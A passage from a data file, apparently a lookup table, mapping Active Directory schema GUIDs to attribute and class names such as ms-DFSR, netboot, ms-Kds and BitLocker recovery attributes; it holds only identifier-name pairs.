\"86b9a69e-f0a6-405d-99bb-77d977992c2a\": \"ms-DFSR-StagingPath\",\n \"07383080-91df-11d1-aebc-0000f80367c1\": \"netboot-Locally-Installed-OSes\",\n \"3e10944d-c354-11d0-aff8-0000f80367c1\": \"Site-Object-BL\",\n \"80997877-f874-4c68-864d-6e508a83bdbd\": \"ms-Authz-Resource-Condition\",\n \"9c2dcbd2-fbf0-4dc7-ace0-8356dcd0f013\": \"IpProtocol\",\n \"bf96792d-0de6-11d0-a285-00aa003049e2\": \"Bad-Password-Time\",\n \"7359a352-90f7-11d1-aebc-0000f80367c1\": \"LDAP-Admin-Limits\",\n \"250a8f20-f6fc-4559-ae65-e4b24c67aebe\": \"ms-DFSR-StagingSizeInMb\",\n \"3e978923-8c01-11d0-afda-00c04fd930c9\": \"Netboot-Machine-File-Path\",\n \"1be8f17c-a9ff-11d0-afe2-00c04fd930c9\": \"Site-Server\",\n \"62f29b60-be74-4630-9456-2f6691993a86\": \"ms-Authz-Central-Access-Policy-ID\",\n \"90df3c3e-1854-4455-a5d7-cad40d56657a\": \"ms-DS-App-Configuration\",\n \"bf96792e-0de6-11d0-a285-00aa003049e2\": \"Bad-Pwd-Count\",\n \"bf96799a-0de6-11d0-a285-00aa003049e2\": \"LDAP-Display-Name\",\n \"5cf0bcc8-60f7-4bff-bda6-aea0344eb151\": \"ms-DFSR-ConflictPath\",\n \"07383078-91df-11d1-aebc-0000f80367c1\": \"netboot-Max-Clients\",\n \"26d9736f-6070-11d1-a9c6-0000f80367c1\": \"SMTP-Mail-Address\",\n \"57f22f7a-377e-42c3-9872-cec6f21d2e3e\": \"ms-Authz-Member-Rules-In-Central-Access-Policy\",\n \"cadd1e5e-fefc-4f3f-b5a9-70e994204303\": \"OncRpc\",\n \"1f0075f9-7e40-11d0-afd6-00c04fd930c9\": \"Birth-Location\",\n \"7359a353-90f7-11d1-aebc-0000f80367c1\": \"LDAP-IPDeny-List\",\n \"9ad33fc9-aacf-4299-bb3e-d1fc6ea88e49\": \"ms-DFSR-ConflictSizeInMb\",\n \"2df90d85-009f-11d2-aa4c-00c04fd7d83a\": \"Netboot-Mirror-Data-File\",\n \"2ab0e76c-7041-11d2-9905-0000f87a57d4\": \"SPN-Mappings\",\n \"516e67cf-fedd-4494-bb3a-bc506a948891\": \"ms-Authz-Member-Rules-In-Central-Access-Policy-BL\",\n \"9e67d761-e327-4d55-bc95-682f875e2f8e\": \"ms-DS-App-Data\",\n \"d50c2cdb-8951-11d1-aebc-0000f80367c1\": \"Bridgehead-Server-List-BL\",\n \"03726ae7-8e7d-4446-8aae-a91657c00993\": \"ms-DFSR-Enabled\",\n \"0738307c-91df-11d1-aebc-0000f80367c1\": \"netboot-New-Machine-Naming-Policy\",\n \"bf967a39-0de6-11d0-a285-00aa003049e2\": \"State-Or-Province-Name\",\n \"fa32f2a6-f28b-47d0-bf91-663e8f910a72\": \"ms-DS-Claim-Source\",\n \"ab911646-8827-4f95-8780-5a8f008eb68f\": \"IpHost\",\n \"d50c2cda-8951-11d1-aebc-0000f80367c1\": \"Bridgehead-Transport-List\",\n \"bf96799b-0de6-11d0-a285-00aa003049e2\": \"Link-ID\",\n \"eeed0fc8-1001-45ed-80cc-bbf744930720\": \"ms-DFSR-ReplicationGroupType\",\n \"0738307d-91df-11d1-aebc-0000f80367c1\": \"netboot-New-Machine-OU\",\n \"bf967a3a-0de6-11d0-a285-00aa003049e2\": \"Street-Address\",\n \"92f19c05-8dfa-4222-bbd1-2c4f01487754\": \"ms-DS-Claim-Source-Type\",\n \"cfee1051-5f28-4bae-a863-5d0cc18a8ed1\": \"ms-DS-Az-Admin-Manager\",\n \"f87fa54b-b2c5-4fd7-88c0-daccb21d93c5\": \"buildingName\",\n \"2ae80fe2-47b4-11d0-a1a4-00c04fd930c9\": \"Link-Track-Secret\",\n \"23e35d4c-e324-4861-a22f-e199140dae00\": \"ms-DFSR-TombstoneExpiryInMin\",\n \"07383082-91df-11d1-aebc-0000f80367c1\": \"netboot-SCP-BL\",\n \"3860949f-f6a8-4b38-9950-81ecb6bc2982\": \"Structural-Object-Class\",\n \"0c2ce4c7-f1c3-4482-8578-c60d4bb74422\": \"ms-DS-Claim-Is-Value-Space-Restricted\",\n \"d95836c3-143e-43fb-992a-b057f1ecadf9\": \"IpNetwork\",\n \"bf96792f-0de6-11d0-a285-00aa003049e2\": \"Builtin-Creation-Time\",\n \"bf96799d-0de6-11d0-a285-00aa003049e2\": \"Lm-Pwd-History\",\n \"d68270ac-a5dc-4841-a6ac-cd68be38c181\": \"ms-DFSR-FileFilter\",\n \"07383081-91df-11d1-aebc-0000f80367c1\": \"netboot-Server\",\n \"bf967a3b-0de6-11d0-a285-00aa003049e2\": \"Sub-Class-Of\",\n \"cd789fb9-96b4-4648-8219-ca378161af38\": \"ms-DS-Claim-Is-Single-Valued\",\n \"ddf8de9b-cba5-4e12-842e-28d8b66f75ec\": \"ms-DS-Az-Application\",\n \"bf967930-0de6-11d0-a285-00aa003049e2\": \"Builtin-Modified-Count\",\n \"bf96799e-0de6-11d0-a285-00aa003049e2\": \"Local-Policy-Flags\",\n \"93c7b477-1f2e-4b40-b7bf-007e8d038ccf\": \"ms-DFSR-DirectoryFilter\",\n \"2df90d84-009f-11d2-aa4c-00c04fd7d83a\": \"Netboot-SIF-File\",\n \"bf967a3c-0de6-11d0-a285-00aa003049e2\": \"Sub-Refs\",\n \"1e5d393d-8cb7-4b4f-840a-973b36cc09c3\": \"ms-DS-Generation-Id\",\n \"72efbf84-6e7b-4a5c-a8db-8a75a7cad254\": \"NisNetgroup\",\n \"bf967931-0de6-11d0-a285-00aa003049e2\": \"Business-Category\",\n \"80a67e4d-9f22-11d0-afdd-00c04fd930c9\": \"Local-Policy-Reference\",\n \"4699f15f-a71f-48e2-9ff5-5897c0759205\": \"ms-DFSR-Schedule\",\n \"0738307f-91df-11d1-aebc-0000f80367c1\": \"netboot-Tools\",\n \"9a7ad94d-ca53-11d1-bbd0-0080c76670c0\": \"SubSchemaSubEntry\",\n \"a13df4e2-dbb0-4ceb-828b-8b2e143e9e81\": \"ms-DS-Primary-Computer\",\n \"860abe37-9a9b-4fa4-b3d2-b8ace5df9ec5\": \"ms-DS-Az-Operation\",\n \"ba305f76-47e3-11d0-a1a6-00c04fd930c9\": \"Bytes-Per-Minute\",\n \"bf9679a1-0de6-11d0-a285-00aa003049e2\": \"Locale-ID\",\n \"048b4692-6227-4b67-a074-c4437083e14b\": \"ms-DFSR-Keywords\",\n \"bf9679d9-0de6-11d0-a285-00aa003049e2\": \"Network-Address\",\n \"963d274c-48be-11d1-a9c3-0000f80367c1\": \"Super-Scope-Description\",\n \"998c06ac-3f87-444e-a5df-11b03dc8a50c\": \"ms-DS-Is-Primary-Computer-For\",\n \"7672666c-02c1-4f33-9ecf-f649c1dd9b7c\": \"NisMap\",\n \"bf967932-0de6-11d0-a285-00aa003049e2\": \"CA-Certificate\",\n \"bf9679a2-0de6-11d0-a285-00aa003049e2\": \"Locality-Name\",\n \"fe515695-3f61-45c8-9bfa-19c148c57b09\": \"ms-DFSR-Flags\",\n \"bf9679da-0de6-11d0-a285-00aa003049e2\": \"Next-Level-Store\",\n \"963d274b-48be-11d1-a9c3-0000f80367c1\": \"Super-Scopes\",\n \"db2c48b2-d14d-ec4e-9f58-ad579d8b440e\": \"ms-Kds-KDF-AlgorithmID\",\n \"8213eac9-9d55-44dc-925c-e9a52b927644\": \"ms-DS-Az-Role\",\n \"963d2740-48be-11d1-a9c3-0000f80367c1\": \"CA-Certificate-DN\",\n \"d9e18316-8939-11d1-aebc-0000f80367c1\": \"Localized-Description\",\n \"d6d67084-c720-417d-8647-b696237a114c\": \"ms-DFSR-Options\",\n \"bf9679db-0de6-11d0-a285-00aa003049e2\": \"Next-Rid\",\n \"5245801d-ca6a-11d0-afff-0000f80367c1\": \"Superior-DNS-Root\",\n \"8a800772-f4b8-154f-b41c-2e4271eff7a7\": \"ms-Kds-KDF-Param\",\n \"904f8a93-4954-4c5f-b1e1-53c097a31e13\": \"NisObject\",\n \"963d2735-48be-11d1-a9c3-0000f80367c1\": \"CA-Connect\",\n \"a746f0d1-78d0-11d2-9916-0000f87a57d4\": \"Localization-Display-Id\",\n \"1035a8e1-67a8-4c21-b7bb-031cdf99d7a0\": \"ms-DFSR-ContentSetGuid\",\n \"52458018-ca6a-11d0-afff-0000f80367c1\": \"Non-Security-Member\",\n \"bf967a3f-0de6-11d0-a285-00aa003049e2\": \"Supplemental-Credentials\",\n \"1702975d-225e-cb4a-b15d-0daea8b5e990\": \"ms-Kds-SecretAgreement-AlgorithmID\",\n \"4feae054-ce55-47bb-860e-5b12063a51de\": \"ms-DS-Az-Scope\",\n \"963d2738-48be-11d1-a9c3-0000f80367c1\": \"CA-Usages\",\n \"09dcb79f-165f-11d0-a064-00aa006c33ed\": \"Location\",\n \"e3b44e05-f4a7-4078-a730-f48670a743f8\": \"ms-DFSR-RdcEnabled\",\n \"52458019-ca6a-11d0-afff-0000f80367c1\": \"Non-Security-Member-BL\",\n \"1677588f-47f3-11d1-a9c3-0000f80367c1\": \"Supported-Application-Context\",\n \"30b099d9-edfe-7549-b807-eba444da79e9\": \"ms-Kds-SecretAgreement-Param\",\n \"a699e529-a637-4b7d-a0fb-5dc466a0b8a7\": \"IEEE802Device\",\n \"963d2736-48be-11d1-a9c3-0000f80367c1\": \"CA-WEB-URL\",\n \"bf9679a4-0de6-11d0-a285-00aa003049e2\": \"Lock-Out-Observation-Window\",\n \"f402a330-ace5-4dc1-8cc9-74d900bf8ae0\": \"ms-DFSR-RdcMinFileSizeInKb\",\n \"19195a56-6da0-11d0-afd3-00c04fd930c9\": \"Notification-List\",\n \"bf967a41-0de6-11d0-a285-00aa003049e2\": \"Surname\",\n \"e338f470-39cd-4549-ab5b-f69f9e583fe0\": \"ms-Kds-PublicKey-Length\",\n \"1ed3a473-9b1b-418a-bfa0-3a37b95a5306\": \"ms-DS-Az-Task\",\n \"d9e18314-8939-11d1-aebc-0000f80367c1\": \"Can-Upgrade-Script\",\n \"bf9679a5-0de6-11d0-a285-00aa003049e2\": \"Lockout-Duration\",\n \"2cc903e2-398c-443b-ac86-ff6b01eac7ba\": \"ms-DFSR-DfsPath\",\n \"bf9679df-0de6-11d0-a285-00aa003049e2\": \"NT-Group-Members\",\n \"037651e4-441d-11d1-a9c3-0000f80367c1\": \"Sync-Attributes\",\n \"615f42a1-37e7-1148-a0dd-3007e09cfc81\": \"ms-Kds-PrivateKey-Length\",\n \"4bcb2477-4bb3-4545-a9fc-fb66e136b435\": \"BootableDevice\",\n \"9a7ad945-ca53-11d1-bbd0-0080c76670c0\": \"Canonical-Name\",\n \"bf9679a6-0de6-11d0-a285-00aa003049e2\": \"Lockout-Threshold\",\n \"51928e94-2cd8-4abe-b552-e50412444370\": \"ms-DFSR-RootFence\",\n \"3e97891f-8c01-11d0-afda-00c04fd930c9\": \"NT-Mixed-Domain\",\n \"037651e3-441d-11d1-a9c3-0000f80367c1\": \"Sync-Membership\",\n \"26627c27-08a2-0a40-a1b1-8dce85b42993\": \"ms-Kds-RootKeyData\",\n \"44f00041-35af-468b-b20a-6ce8737c580b\": \"ms-DS-Optional-Feature\",\n \"d4159c92-957d-4a87-8a67-8d2934e01649\": \"carLicense\",\n \"28630ebf-41d5-11d1-a9c1-0000f80367c1\": \"Lockout-Time\",\n \"2dad8796-7619-4ff8-966e-0a5cc67b287f\": \"ms-DFSR-ReplicationGroupGuid\",\n \"bf9679e2-0de6-11d0-a285-00aa003049e2\": \"Nt-Pwd-History\",\n \"037651e2-441d-11d1-a9c3-0000f80367c1\": \"Sync-With-Object\",\n \"d5f07340-e6b0-1e4a-97be-0d3318bd9db1\": \"ms-Kds-Version\",\n \"d6710785-86ff-44b7-85b5-f1f8689522ce\": \"msSFU-30-Mail-Aliases\",\n \"7bfdcb81-4807-11d1-a9c3-0000f80367c1\": \"Catalogs\",\n \"bf9679a9-0de6-11d0-a285-00aa003049e2\": \"Logo\",\n \"f7b85ba9-3bf9-428f-aab4-2eee6d56f063\": \"ms-DFSR-DfsLinkTarget\",\n \"bf9679e3-0de6-11d0-a285-00aa003049e2\": \"NT-Security-Descriptor\",\n \"037651e5-441d-11d1-a9c3-0000f80367c1\": \"Sync-With-SID\",\n \"96400482-cf07-e94c-90e8-f2efc4f0495e\": \"ms-Kds-DomainID\",\n \"3bcd9db8-f84b-451c-952f-6c52b81f9ec6\": \"ms-DS-Password-Settings\",\n \"7bfdcb7e-4807-11d1-a9c3-0000f80367c1\": \"Categories\",\n \"bf9679aa-0de6-11d0-a285-00aa003049e2\": \"Logon-Count\",\n \"261337aa-f1c3-44b2-bbea-c88d49e6f0c7\": \"ms-DFSR-MemberReference\",\n \"bf9679e4-0de6-11d0-a285-00aa003049e2\": \"Obj-Dist-Name\",\n \"bf967a43-0de6-11d0-a285-00aa003049e2\": \"System-Auxiliary-Class\",\n \"6cdc047f-f522-b74a-9a9c-d95ac8cdfda2\": \"ms-Kds-UseStartTime\",\n \"e263192c-2a02-48df-9792-94f2328781a0\": \"msSFU-30-Net-Id\",\n \"7d6c0e94-7e20-11d0-afd6-00c04fd930c9\": \"Category-Id\",\n \"bf9679ab-0de6-11d0-a285-00aa003049e2\": \"Logon-Hours\",\n \"6c7b5785-3d21-41bf-8a8a-627941544d5a\": \"ms-DFSR-ComputerReference\",\n \"26d97369-6070-11d1-a9c6-0000f80367c1\": \"Object-Category\",\n \"e0fa1e62-9b45-11d0-afdd-00c04fd930c9\": \"System-Flags\",\n \"ae18119f-6390-0045-b32d-97dbc701aef7\": \"ms-Kds-CreateTime\",\n \"5b06b06a-4cf3-44c0-bd16-43bc10a987da\": \"ms-DS-Password-Settings-Container\",\n \"963d2732-48be-11d1-a9c3-0000f80367c1\": \"Certificate-Authority-Object\",\n \"bf9679ac-0de6-11d0-a285-00aa003049e2\": \"Logon-Workstation\",\n \"adde62c6-1880-41ed-bd3c-30b7d25e14f0\": \"ms-DFSR-MemberReferenceBL\",\n \"bf9679e5-0de6-11d0-a285-00aa003049e2\": \"Object-Class\",\n \"bf967a44-0de6-11d0-a285-00aa003049e2\": \"System-May-Contain\",\n \"9cdfdbc5-0304-4569-95f6-c4f663fe5ae6\": \"ms-Imaging-Thumbprint-Hash\",\n \"36297dce-656b-4423-ab65-dabb2770819e\": \"msSFU-30-Domain-Info\",\n \"1677579f-47f3-11d1-a9c3-0000f80367c1\": \"Certificate-Revocation-List\",\n \"bf9679ad-0de6-11d0-a285-00aa003049e2\": \"LSA-Creation-Time\",\n \"5eb526d7-d71b-44ae-8cc6-95460052e6ac\": \"ms-DFSR-ComputerReferenceBL\",\n \"bf9679e6-0de6-11d0-a285-00aa003049e2\": \"Object-Class-Category\",\n \"bf967a45-0de6-11d0-a285-00aa003049e2\": \"System-Must-Contain\",\n \"8ae70db5-6406-4196-92fe-f3bb557520a7\": \"ms-Imaging-Hash-Algorithm\",\n \"da83fc4f-076f-4aea-b4dc-8f4dab9b5993\": \"ms-DS-Quota-Container\",\n \"2a39c5b1-8960-11d1-aebc-0000f80367c1\": \"Certificate-Templates\",\n \"bf9679ae-0de6-11d0-a285-00aa003049e2\": \"LSA-Modified-Count\",\n \"eb20e7d6-32ad-42de-b141-16ad2631b01b\": \"ms-DFSR-Priority\",\n \"9a7ad94b-ca53-11d1-bbd0-0080c76670c0\": \"Object-Classes\",\n \"bf967a46-0de6-11d0-a285-00aa003049e2\": \"System-Only\",\n \"3f78c3e5-f79a-46bd-a0b8-9d18116ddc79\": \"ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity\",\n \"e15334a3-0bf0-4427-b672-11f5d84acc92\": \"msSFU-30-Network-User\",\n \"548e1c22-dea6-11d0-b010-0000f80367c1\": \"Class-Display-Name\",\n \"bf9679af-0de6-11d0-a285-00aa003049e2\": \"Machine-Architecture\",\n \"817cf0b8-db95-4914-b833-5a079ef65764\": \"ms-DFSR-DeletedPath\",\n \"34aaa216-b699-11d0-afee-0000f80367c1\": \"Object-Count\",\n \"bf967a47-0de6-11d0-a285-00aa003049e2\": \"System-Poss-Superiors\",\n \"e362ed86-b728-0842-b27d-2dea7a9df218\": \"ms-DS-ManagedPassword\",\n \"de91fc26-bd02-4b52-ae26-795999e96fc7\": \"ms-DS-Quota-Control\",\n \"bf967938-0de6-11d0-a285-00aa003049e2\": \"Code-Page\",\n \"c9b6358e-bb38-11d0-afef-0000f80367c1\": \"Machine-Password-Change-Interval\",\n \"53ed9ad1-9975-41f4-83f5-0c061a12553a\": \"ms-DFSR-DeletedSizeInMb\",\n \"bf9679e7-0de6-11d0-a285-00aa003049e2\": \"Object-Guid\",\n \"bf967a49-0de6-11d0-a285-00aa003049e2\": \"Telephone-Number\",\n \"0e78295a-c6d3-0a40-b491-d62251ffa0a6\": \"ms-DS-ManagedPasswordId\",\n \"faf733d0-f8eb-4dcf-8d75-f1753af6a50b\": \"msSFU-30-NIS-Map-Config\",\n \"bf96793b-0de6-11d0-a285-00aa003049e2\": \"COM-ClassID\",\n \"bf9679b2-0de6-11d0-a285-00aa003049e2\": \"Machine-Role\",\n \"5ac48021-e447-46e7-9d23-92c0c6a90dfb\": \"ms-DFSR-ReadOnly\",\n \"bf9679e8-0de6-11d0-a285-00aa003049e2\": \"Object-Sid\",\n \"bf967a4a-0de6-11d0-a285-00aa003049e2\": \"Teletex-Terminal-Identifier\",\n \"d0d62131-2d4a-d04f-99d9-1c63646229a4\": \"ms-DS-ManagedPasswordPreviousId\",\n \"ce206244-5827-4a86-ba1c-1c0c386c1b64\": \"ms-DS-Managed-Service-Account\",\n \"281416d9-1968-11d0-a28f-00aa003049e2\": \"COM-CLSID\",\n \"80a67e4f-9f22-11d0-afdd-00c04fd930c9\": \"Machine-Wide-Policy\",\n \"db7a08e7-fc76-4569-a45f-f5ecb66a88b5\": \"ms-DFSR-CachePolicy\",\n \"16775848-47f3-11d1-a9c3-0000f80367c1\": \"Object-Version\",\n \"bf967a4b-0de6-11d0-a285-00aa003049e2\": \"Telex-Number\",\n \"f8758ef7-ac76-8843-a2ee-a26b4dcaf409\": \"ms-DS-ManagedPasswordInterval\",\n \"1cb81863-b822-4379-9ea2-5ff7bdc6386d\": \"ms-net-ieee-80211-GroupPolicy\",\n \"bf96793c-0de6-11d0-a285-00aa003049e2\": \"COM-InterfaceID\",\n \"0296c120-40da-11d1-a9c0-0000f80367c1\": \"Managed-By\",\n \"4c5d607a-ce49-444a-9862-82a95f5d1fcc\": \"ms-DFSR-MinDurationCacheInMin\",\n \"bf9679ea-0de6-11d0-a285-00aa003049e2\": \"OEM-Information\",\n \"0296c121-40da-11d1-a9c0-0000f80367c1\": \"Telex-Primary\",\n \"888eedd6-ce04-df40-b462-b8a50e41ba38\": \"ms-DS-GroupMSAMembership\",\n \"281416dd-1968-11d0-a28f-00aa003049e2\": \"COM-Other-Prog-Id\",\n \"0296c124-40da-11d1-a9c0-0000f80367c1\": \"Managed-Objects\",\n \"2ab0e48d-ac4e-4afc-83e5-a34240db6198\": \"ms-DFSR-MaxAgeInCacheInMin\",\n \"bf9679ec-0de6-11d0-a285-00aa003049e2\": \"OM-Object-Class\",\n \"ed9de9a0-7041-11d2-9905-0000f87a57d4\": \"Template-Roots\",\n \"55872b71-c4b2-3b48-ae51-4095f91ec600\": \"ms-DS-Transformation-Rules\",\n \"99a03a6a-ab19-4446-9350-0cb878ed2d9b\": \"ms-net-ieee-8023-GroupPolicy\",\n \"bf96793d-0de6-11d0-a285-00aa003049e2\": \"COM-ProgID\",\n \"bf9679b5-0de6-11d0-a285-00aa003049e2\": \"Manager\",\n \"43061ac1-c8ad-4ccc-b785-2bfac20fc60a\": \"ms-FVE-RecoveryPassword\",\n \"bf9679ed-0de6-11d0-a285-00aa003049e2\": \"OM-Syntax\",\n \"6db69a1c-9422-11d1-aebd-0000f80367c1\": \"Terminal-Server\",\n \"86284c08-0c6e-1540-8b15-75147d23d20d\": \"ms-DS-Ingress-Claims-Transformation-Policy\",\n \"fa85c591-197f-477e-83bd-ea5a43df2239\": \"ms-DFSR-LocalSettings\",\n \"281416db-1968-11d0-a28f-00aa003049e2\": \"COM-Treat-As-Class-Id\",\n \"bf9679b7-0de6-11d0-a285-00aa003049e2\": \"MAPI-ID\",\n \"85e5a5cf-dcee-4075-9cfd-ac9db6a2f245\": \"ms-FVE-VolumeGuid\",\n \"ddac0cf3-af8f-11d0-afeb-00c04fd930c9\": \"OMT-Guid\",\n \"f0f8ffa7-1191-11d0-a060-00aa006c33ed\": \"Text-Country\",\n \"c137427e-9a73-b040-9190-1b095bb43288\": \"ms-DS-Egress-Claims-Transformation-Policy\",\n \"ea715d30-8f53-40d0-bd1e-6109186d782c\": \"ms-FVE-RecoveryInformation\",\n \"281416de-1968-11d0-a28f-00aa003049e2\": \"COM-Typelib-Id\",\n \"bf9679b9-0de6-11d0-a285-00aa003049e2\": \"Marshalled-Interface\",\n \"1fd55ea8-88a7-47dc-8129-0daa97186a54\": \"ms-FVE-KeyPackage\",\n \"1f0075fa-7e40-11d0-afd6-00c04fd930c9\": \"OMT-Indx-Guid\",\n \"a8df7489-c5ea-11d1-bbcb-0080c76670c0\": \"Text-Encoded-OR-Address\",\n \"d5006229-9913-2242-8b17-83761d1e0e5b\": \"ms-DS-TDO-Egress-BL\",\n \"e11505d7-92c4-43e7-bf5c-295832ffc896\": \"ms-DFSR-Subscriber\",\n \"281416da-1968-11d0-a28f-00aa003049e2\": \"COM-Unique-LIBID\",\n \"e48e64e0-12c9-11d3-9102-00c04fd91ab1\": \"Mastered-By\",\n \"f76909bc-e678-47a0-b0b3-f86a0044c06d\": \"ms-FVE-RecoveryGuid\",\n \"3e978925-8c01-11d0-afda-00c04fd930c9\": \"Operating-System\",\n \"ddac0cf1-af8f-11d0-afeb-00c04fd930c9\": \"Time-Refresh\",\n \"5a5661a1-97c6-544b-8056-e430fe7bc554\": \"ms-DS-TDO-Ingress-BL\",\n \"25173408-04ca-40e8-865e-3f9ce9bf1bd3\": \"ms-DFS-Deleted-Link-v2\",\n \"bf96793e-0de6-11d0-a285-00aa003049e2\": \"Comment\",\n \"bf9679bb-0de6-11d0-a285-00aa003049e2\": \"Max-Pwd-Age\",\n \"aa4e1a6d-550d-4e05-8c35-4afcb917a9fe\": \"ms-TPM-OwnerInformation\",\n \"bd951b3c-9c96-11d0-afdd-00c04fd930c9\": \"Operating-System-Hotfix\",\n \"ddac0cf0-af8f-11d0-afeb-00c04fd930c9\": \"Time-Vol-Change\",\n \"0bb49a10-536b-bc4d-a273-0bab0dd4bd10\": \"ms-DS-Transformation-Rules-Compiled\",\n \"67212414-7bcc-4609-87e0-088dad8abdee\": \"ms-DFSR-Subscription\",\n \"bf96793f-0de6-11d0-a285-00aa003049e2\": \"Common-Name\",\n \"bf9679bc-0de6-11d0-a285-00aa003049e2\": \"Max-Renew-Age\",\n \"0e0d0938-2658-4580-a9f6-7a0ac7b566cb\": \"ms-ieee-80211-Data\",\n \"3e978927-8c01-11d0-afda-00c04fd930c9\": \"Operating-System-Service-Pack\",\n \"bf967a55-0de6-11d0-a285-00aa003049e2\": \"Title\",\n \"693f2006-5764-3d4a-8439-58f04aab4b59\": \"ms-DS-Applies-To-Resource-Types\",\n \"7769fb7a-1159-4e96-9ccd-68bc487073eb\": \"ms-DFS-Link-v2\",\n \"f0f8ff88-1191-11d0-a060-00aa006c33ed\": \"Company\",\n \"bf9679bd-0de6-11d0-a285-00aa003049e2\": \"Max-Storage\",\n \"6558b180-35da-4efe-beed-521f8f48cafb\": \"ms-ieee-80211-Data-Type\",\n \"3e978926-8c01-11d0-afda-00c04fd930c9\": \"Operating-System-Version\",\n \"16c3a860-1273-11d0-a060-00aa006c33ed\": \"Tombstone-Lifetime\",\n \"24977c8c-c1b7-3340-b4f6-2b375eb711d7\": \"ms-DS-RID-Pool-Allocation-Enabled\",\n \"7b35dbad-b3ec-486a-aad4-2fec9d6ea6f6\": \"ms-DFSR-GlobalSettings\",\n \"bf967943-0de6-11d0-a285-00aa003049e2\": \"Content-Indexing-Allowed\",\n \"bf9679be-0de6-11d0-a285-00aa003049e2\": \"Max-Ticket-Age\",\n \"7f73ef75-14c9-4c23-81de-dd07a06f9e8b\": \"ms-ieee-80211-ID\",\n \"bf9679ee-0de6-11d0-a285-00aa003049e2\": \"Operator-Count\",\n \"c1dc867c-a261-11d1-b606-0000f80367c1\": \"Transport-Address-Attribute\",\n \"9709eaaf-49da-4db2-908a-0446e5eab844\": \"ms-DS-cloudExtensionAttribute1\",\n \"da73a085-6e64-4d61-b064-015d04164795\": \"ms-DFS-Namespace-Anchor\",\n \"4d8601ee-ac85-11d0-afe3-00c04fd930c9\": \"Context-Menu\",\n \"bf9679bf-0de6-11d0-a285-00aa003049e2\": \"May-Contain\",\n \"8a5c99e9-2230-46eb-b8e8-e59d712eb9ee\": \"ms-IIS-FTP-Dir\",\n \"963d274d-48be-11d1-a9c3-0000f80367c1\": \"Option-Description\",\n \"26d97372-6070-11d1-a9c6-0000f80367c1\": \"Transport-DLL-Name\",\n \"f34ee0ac-c0c1-4ba9-82c9-1a90752f16a5\": \"ms-DS-cloudExtensionAttribute2\",\n \"1c332fe0-0c2a-4f32-afca-23c5e45a9e77\": \"ms-DFSR-ReplicationGroup\",\n \"6da8a4fc-0e52-11d0-a286-00aa003049e2\": \"Control-Access-Rights\",\n \"11b6cc8b-48c4-11d1-a9c3-0000f80367c1\": \"meetingAdvertiseScope\",\n \"2a7827a4-1483-49a5-9d84-52e3812156b4\": \"ms-IIS-FTP-Root\",\n \"19195a53-6da0-11d0-afd3-00c04fd930c9\": \"Options\",\n \"26d97374-6070-11d1-a9c6-0000f80367c1\": \"Transport-Type\",\n \"82f6c81a-fada-4a0d-b0f7-706d46838eb5\": \"ms-DS-cloudExtensionAttribute3\",\n \"21cb8628-f3c3-4bbf-bff6-060b2d8f299a\": \"ms-DFS-Namespace-v2\",\n \"bf967944-0de6-11d0-a285-00aa003049e2\": \"Cost\",\n \"11b6cc83-48c4-11d1-a9c3-0000f80367c1\": \"meetingApplication\",\n \"51583ce9-94fa-4b12-b990-304c35b18595\": \"ms-Imaging-PSP-Identifier\",\n \"963d274e-48be-11d1-a9c3-0000f80367c1\": \"Options-Location\",\n \"8fd044e3-771f-11d1-aeae-0000f80367c1\": \"Treat-As-Leaf\",\n \"9cbf3437-4e6e-485b-b291-22b02554273f\": \"ms-DS-cloudExtensionAttribute4\",\n \"64759b35-d3a1-42e4-b5f1-a3de162109b3\": \"ms-DFSR-Content\",\n \"508ca374-a511-4e4e-9f4f-856f61a6b7e4\": \"Address-Book-Roots2\",\n \"5fd42471-1262-11d0-a060-00aa006c33ed\": \"Country-Code\",\n \"11b6cc92-48c4-11d1-a9c3-0000f80367c1\": \"meetingBandwidth\",\n \"7b6760ae-d6ed-44a6-b6be-9de62c09ec67\": \"ms-Imaging-PSP-String\",\n \"bf9679ef-0de6-11d0-a285-00aa003049e2\": \"Organization-Name\",\n \"28630ebd-41d5-11d1-a9c1-0000f80367c1\": \"Tree-Name\",\n \"2915e85b-e347-4852-aabb-22e5a651c864\": \"ms-DS-cloudExtensionAttribute5\",\n \"4898f63d-4112-477c-8826-3ca00bd8277d\": \"Global-Address-List2\",\n \"bf967945-0de6-11d0-a285-00aa003049e2\": \"Country-Name\",\n \"11b6cc93-48c4-11d1-a9c3-0000f80367c1\": \"meetingBlob\",\n \"35697062-1eaf-448b-ac1e-388e0be4fdee\": \"ms-net-ieee-80211-GP-PolicyGUID\",\n \"bf9679f0-0de6-11d0-a285-00aa003049e2\": \"Organizational-Unit-Name\",\n \"80a67e5a-9f22-11d0-afdd-00c04fd930c9\": \"Trust-Attributes\",\n \"60452679-28e1-4bec-ace3-712833361456\": \"ms-DS-cloudExtensionAttribute6\",\n \"4937f40d-a6dc-4d48-97ca-06e5fbfd3f16\": \"ms-DFSR-ContentSet\",\n \"b1cba91a-0682-4362-a659-153e201ef069\": \"Template-Roots2\",\n \"2b09958a-8931-11d1-aebc-0000f80367c1\": \"Create-Dialog\",\n \"11b6cc87-48c4-11d1-a9c3-0000f80367c1\": \"meetingContactInfo\",\n \"9c1495a5-4d76-468e-991e-1433b0a67855\": \"ms-net-ieee-80211-GP-PolicyData\",\n \"28596019-7349-4d2f-adff-5a629961f942\": \"organizationalStatus\",\n \"bf967a59-0de6-11d0-a285-00aa003049e2\": \"Trust-Auth-Incoming\",\n \"4a7c1319-e34e-40c2-9d00-60ff7890f207\": \"ms-DS-cloudExtensionAttribute7\",\n \"2df90d73-009f-11d2-aa4c-00c04fd7d83a\": \"Create-Time-Stamp\",\n \"11b6cc7e-48c4-11d1-a9c3-0000f80367c1\": \"meetingDescription\",\n \"0f69c62e-088e-4ff5-a53a-e923cec07c0a\": \"ms-net-ieee-80211-GP-PolicyReserved\",\n \"5fd424ce-1262-11d0-a060-00aa006c33ed\": \"Original-Display-Table\",\n \"bf967a5f-0de6-11d0-a285-00aa003049e2\": \"Trust-Auth-Outgoing\",\n \"3cd1c514-8449-44ca-81c0-021781800d2a\": \"ms-DS-cloudExtensionAttribute8\",\n \"04828aa9-6e42-4e80-b962-e2fe00754d17\": \"ms-DFSR-Topology\",\n \"b8442f58-c490-4487-8a9d-d80b883271ad\": \"ms-DS-Claim-Type-Property-Base\",\n \"2b09958b-8931-11d1-aebc-0000f80367c1\": \"Create-Wizard-Ext\",\n \"11b6cc91-48c4-11d1-a9c3-0000f80367c1\": \"meetingEndTime\",\n \"94a7b05a-b8b2-4f59-9c25-39e69baa1684\": \"ms-net-ieee-8023-GP-PolicyGUID\",\n \"5fd424cf-1262-11d0-a060-00aa006c33ed\": 